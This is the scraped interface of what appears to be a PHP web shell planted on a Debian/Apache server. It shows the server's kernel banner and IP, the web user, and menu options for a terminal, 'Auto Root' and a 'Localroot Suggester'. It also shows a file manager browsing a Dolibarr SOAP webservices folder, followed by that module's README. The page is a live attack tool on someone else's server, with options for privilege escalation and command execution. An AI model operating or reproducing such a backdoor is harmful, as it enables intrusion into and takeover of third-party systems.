Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
speed.bdcloud.fr /
webservices /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxrwxrwx
2020-09-02 15:32
.htaccess
510
B
-rw-r--r--
2023-01-18 07:38
README.md
797
B
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_actioncomm.php-NORUN
4.31
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_category.php-NORUN
2.74
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_invoice.php-NORUN
3.92
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_order.php-NORUN
3.92
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_other.php-NORUN
2.91
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_productorservice.php-NORUN
4.97
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_project.php-NORUN
4.26
KB
-rwxrwxrwx
2020-09-02 15:31
demo_wsclient_thirdparty.php-NORUN
6.17
KB
-rwxrwxrwx
2020-09-02 15:31
index.php
29.63
KB
-rwxrwxrwx
2023-01-18 07:38
server_actioncomm.php
18.31
KB
-rwxrwxrwx
2020-09-02 15:31
server_category.php
7.87
KB
-rwxrwxrwx
2020-09-02 15:31
server_contact.php
23.58
KB
-rwxrwxrwx
2020-09-02 15:31
server_invoice.php
27.99
KB
-rwxrwxrwx
2020-09-02 15:31
server_order.php
29.99
KB
-rwxrwxrwx
2020-09-02 15:31
server_other.php
9.02
KB
-rwxrwxrwx
2020-09-02 15:31
server_payment.php
7.72
KB
-rwxrwxrwx
2020-09-02 15:31
server_productorservice.php
39.3
KB
-rwxrwxrwx
2020-09-02 15:31
server_project.php
14.88
KB
-rwxrwxrwx
2020-09-02 15:31
server_supplier_invoice.php
15.48
KB
-rwxrwxrwx
2020-09-02 15:31
server_thirdparty.php
28.67
KB
-rwxrwxrwx
2020-09-02 15:31
server_user.php
23.8
KB
-rwxrwxrwx
2020-09-02 15:31
Save
Rename
API SOAP howto ============== This directory contains files to make Dolibarr a server of SOAP Web Services. WARNING: It is highly recommended to use the REST APIs instead of SOAP APIs: You will find more API, faster and easier to use in the the module REST API than into this module. Explore the api --------------- * To see all Webservices provided by Dolibarr, just call the following Url: http://mydomain.com/mydolibarr/webservices/admin/index.php Access to the API ----------------- * WSDL file of a Web service provided by Dolibarr can be obtained at: http://mydomain.com/mydolibarr/webservices/server_xxx.php?wsdl Note, you can test this Webservices by calling the page http://mydomain.com/mydolibarr/webservices/demo_wsclient_xxx.php (You must first remove the -NORUN into file).